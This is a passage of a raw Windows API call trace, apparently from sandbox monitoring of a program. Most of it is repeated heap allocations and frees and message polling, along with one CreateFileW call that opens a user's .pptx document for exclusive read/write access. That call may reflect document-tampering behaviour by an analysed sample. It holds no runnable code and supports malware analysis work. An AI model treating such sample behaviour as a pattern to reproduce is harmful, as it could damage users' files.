lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.179] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.179] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.179] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0171.179] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.179] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.179] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.182] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.182] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0171.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba0f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0171.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k55l_7um1tyjpsga.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9cf948 | out: hHeap=0x8a0000) returned 1 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.186] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, 